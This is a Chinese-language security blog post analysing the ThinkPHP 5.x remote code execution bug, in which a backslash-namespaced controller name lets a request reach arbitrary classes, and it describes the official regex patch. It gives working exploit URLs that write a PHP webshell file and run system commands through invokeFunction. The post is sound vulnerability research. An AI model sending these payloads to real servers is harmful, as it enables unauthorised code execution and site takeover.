

Hu3sky's blog

Thinkphp5.* getshell 分析

Hu3sky's blog

Thinkphp5.* getshell 分析

Word count: 691 / Reading time: 3 min

 2019/01/11   Share

• 
• 
• 
• 
• 

Thinkphp5.x getshell分析

之前一直没时间看分析。。这下放假了有时间了。。倒过来看看tp5的分析

漏洞分析

访问
http://127.0.0.1:12345/thinkphp5/public/index.php/index/index/index
入口
index.php
模块
index
控制器
index
方法
index

直接看漏洞点

thinkphp/library/think/route/dispatch/Module.php:70

跟进$controller的走向
发现同文件下，92行，在exec方法，使用controller函数对控制器进行了实例化

跟进controller函数
在

文件：thinkphp/library/think/App.php
函数： controller

跟进parseModuleAndClass函数

文件：thinkphp/library/think/App.php
函数： parseModuleAndClass

这里如果控制器名存在反斜线\，将会将其直接设置为类名

继续跟进parseClass

文件：thinkphp/library/think/App.php
方法：parseClass

继续跟进parseName

文件：thinkphp/library/think/App.php
方法：parseName

这里会检测首字母是否大写，如果没有大写。就转为大写
接着讲class名进行命名空间完整返回

于是类变为app\index\controller\Index
接着回到parseModuleAndClass函数

return了$module和$class

接着回到controller方法

用class_exists函数进行判断，该类是否存在
此时，我们的类是 app\index\controller\Index
之后就会实例化类，再去调用类的方法

形如：http://127.0.0.1/index.php?s=/index/namespace\class/method

漏洞利用

\think\template\driver\File

也就是说，我们可以利用命名空间的\，去实例化一个任意的类
比如 我想要调用thinkphp\library\think\template\driver\File.php下的write方法

注意tp5的根命名空间

名称         描述                  类库目录
think      系统核心类库      thinkphp/library/think
traits      系统Trait类库      thinkphp/library/traits
app      应用类库               application

所以说我构造payload，注意，这里要用到兼容模式的url模式去访问
因为例如访问
127.0.0.1:12345/thinkphp5/public/index.php/index/\think\template\driver\file/write
浏览器会默认把 \ 变成 /， 就会报错

但是使用兼容模式就可以避免

http://127.0.0.1:12345/thinkphp5/public/index.php? s=index/\think\template\driver\file/write? cacheFile=shell.php &content=%3C?php%20phpinfo();?%3E

就会再根目录下生成shell.php

\think\Container

方法：invokeFunction

call_user_func_array()：

说明 
call_user_func_array ( callable $callback , array $param_arr ) : mixed

把第一个参数作为回调函数（callback）调用，把参数数组作（param_arr）为回调函数的的参数传入。

于是可以构造

127.0.0.1:12345/thinkphp5/public/index.php?
s=index/\think\container/invokeFunction
&function=call_user_func_array
&vars[0]=system
&vars[1][]=dir

分别对应

模块: index
控制器：\think\container
方法：invokeFunction

官方补丁

文件：

library/think/route/dispatch/Module.php
方法：
init

增加了对$controller的正则过滤,导致无法再传入
\think\app这种形式的控制器

原文作者: Hu3sky

原文链接: http://yoursite.com/2019/01/11/tp5/

发表日期: January 11th 2019, 1:01:00 pm

版权声明: 本文采用知识共享署名-非商业性使用 4.0 国际许可协议进行许可

• Next Post
  Tp5.0.0-5.0.23 RCE学习
• Previous Post
  PHPCMS2008_getshell

Powered by Hexotheme Archer

本站总访问量次

本站总访问量: :)

CATALOG

1. 1. Thinkphp5.x getshell分析
   1. 1.1. 漏洞分析
   2. 1.2. 漏洞利用
      1. 1.2.1. \think\template\driver\File
      2. 1.2.2. \think\Container
   3. 1.3. 官方补丁



• Archive
• Tag
• Cate

Total : 101

2021

• 01/22Oracle补丁日 ：CVE-2020-14756 漏洞利用及补丁分析
• 01/18CVE-2020-17518/17519：Apache Flink 目录遍历漏洞&路由分析
• 01/042020 总结 & 2021 计划

2020

• 12/11浅析 S2-061
• 10/19Websphere 最新版9.0.5.5 反序列化入口挖掘以及XXE构造
• 04/19Orcale 4月补丁日的几个漏洞以及CVE-2020-2801的简单分析
• 04/08CVE-2020-10204/CVE-2020-10199 Nexus Repository Manager3 分析&以及三个类的回显构造
• 03/20weblogic t3 协议利用与防御
• 03/08CVE-2020-2555 漏洞分析
• 03/06JMX-RMI
• 01/06shiro-1.2.4-rememberMe反序列化分析与基于Commons-Collections3.2.1下的payload构造

2019

• 12/20CVE-2018-1270 Remote Code Execution with spring-messaging 分析
• 10/20Joomla 3.4.6 远程代码执行
• 10/16WebLogic-XMLDecoder反序列化分析
• 10/05Fastjson反序列化漏洞以及多版本补丁分析
• 10/02JAVA XXE
• 09/24Thinkphp多个版本注入分析
• 09/20Thinkphp3个版本数据库操作以及底层代码分析
• 09/13java反序列化由浅入深及JNDI注入理解(二)-JAVA Apache-Commons-Collections
• 09/10Ciscn华北赛区Dropbox题解
• 09/08java反序列化由浅入深及JNDI注入理解(一)-Spring反序列化
• 09/062019护网杯esaypy
• 09/04php-fpm&fast-cgi学习
• 08/24java安全漏洞入门之 s2-001
• 08/24java安全漏洞入门之 s2-003&s2-005
• 08/21.user.ini后门
• 08/15laravel5.7-unserialize-RCE
• 08/08De1CTF Ssrfme 详解
• 08/06深入理解浏览器编码
• 05/13bypassUAC_via_comhijacking
• 05/07JavaScript Prototype 污染攻击之 Code-Breaking-TheJS篇
• 05/06JavaScript Prototype 污染攻击之 基础篇
• 04/24内网中的PowerSploit
• 04/23第12届全国大学生信息安全竞赛Web题解
• 04/22DDCTF部分 Write up
• 04/21How To Use Cobalt Strike(备忘录)
• 04/02Content Security Policy&Bypass
• 04/01跨域相关问题
• 03/27Windows安全下的一些网络认证
• 03/21三层内网搭建&MSF正反向代理穿透
• 02/28WordPress5.0 RCE 分析
• 02/22About OAuth2.0
• 02/20Metinfo 6.1.2 SqlInjection
• 02/16初识Redis未授权访问
• 02/15nullcon ctf 部分web
• 02/1435c3-POST 学习
• 02/11Pwnhub Pink friend 学习
• 02/09LCTF-babyphp's revenge
• 02/07HCTF2018 部分Web
• 01/31从两道CTF实例看python格式化字符串漏洞
• 01/29DiscuzX 3.4 前台SSRF
• 01/28齐博CMSv7审计
• 01/28从SCTF看nginx配置问题
• 01/23Code-Breaking Puzzles
• 01/210ctf-ezdoor
• 01/18Tp5.0.0-5.0.23 RCE学习
• 01/11Thinkphp5.* getshell 分析
• 01/11PHPCMS2008_getshell
• 01/0735C3 CTF 部分解题记录（junior）

2018

• 12/25SWPUCTF_WP
• 12/23寒假学习计划
• 10/06destoon前台getshell复现
• 09/12YXCMS 1.4.7
• 09/12YXCMS 1.4.7 - Arbitrary file deletion
• 09/07反序列化之phar://学习
• 09/06ssh后门
• 09/03Git
• 09/01python装饰器
• 08/30hackme CTF 记录
• 08/25php-security-calendar-2017
• 08/25eyoucms前台getshell复现
• 08/23Hooskcms 几个小洞
• 08/18Hack the ch4inrulz of Vulnhub
• 08/18Bugku sql注入2
• 08/07Vulnhub\|Cyberry靶机
• 07/17java学习笔记
• 07/05暑假学习计划
• 07/03Bob 1.0.1
• 06/29浅谈XML实体注入漏洞
• 06/22Vulnhub Bsides靶机
• 06/11Linux
• 06/06超级玛丽靶机渗透测试笔记
• 06/04jarvisoj WP
• 05/25域渗透练习
• 05/23Empire使用总结
• 05/09ctf一道题目。php反序列化学习
• 05/03记一次kali渗透测试靶机
• 04/25[Untitled Post]
• 04/24i春秋WP
• 04/24实验吧WP
• 04/20scrapy爬虫实例
• 04/17webug wp
• 04/15线下赛总结
• 04/101个月学习计划
• 04/10Scrapy笔记
• 04/01rnpnet tiki-calendar.php页面存在代码执行漏洞
• 03/28cookie与session的笔记
• 03/23VehicleWorkshop上传漏洞本地复现
• 03/16Redtiger题目
• 03/15会员日Pwnhub题目的复现
• 01/13Flask_SSTI



缺失模块。
1、请确保node版本大于6.2
2、在博客根目录（注意不是archer根目录）执行以下命令：
npm i hexo-generator-json-content --save
3、在根目录_config.yml里添加配置：

jsonContent:
  meta: false
  pages: false
  posts:
    title: true
    date: true
    path: true
    text: false
    raw: false
    content: false
    slug: false
    updated: false
    comments: false
    link: false
    permalink: false
    excerpt: false
    categories: true
    tags: true

CTF writeup 规划 学习计划 渗透测试 浏览器安全 java安全 漏洞分析 备忘录 代码审计 write-up 学习笔记 Linux Arbitrary-File-Upload CVE-Request sql注入 http协议 内网渗透 Empire git php反序列化 JavaScript python scrapy php魔法 xxe 代码执行 内网 后门 线下赛 前端 域渗透

